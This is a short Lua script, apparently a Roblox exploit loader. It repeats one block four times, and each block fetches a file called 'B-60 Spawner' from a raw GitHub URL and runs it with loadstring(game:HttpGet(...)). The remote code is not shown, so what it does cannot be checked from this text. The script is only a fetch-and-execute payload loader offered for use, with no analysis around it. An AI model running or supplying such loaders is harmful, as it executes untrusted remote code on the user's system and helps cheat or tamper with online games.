--test
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/jee/main/B-60%20Spawner"))()
end)()
--

--test1
coroutine.wrap(function()
wait(0.01)
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/jee/main/B-60%20Spawner"))()
end)()
--

--test2
coroutine.wrap(function()
wait(0.02)
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/jee/main/B-60%20Spawner"))()
end)()
--

--test3
coroutine.wrap(function()
wait(0.03)
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/jee/main/B-60%20Spawner"))()
end)()
--
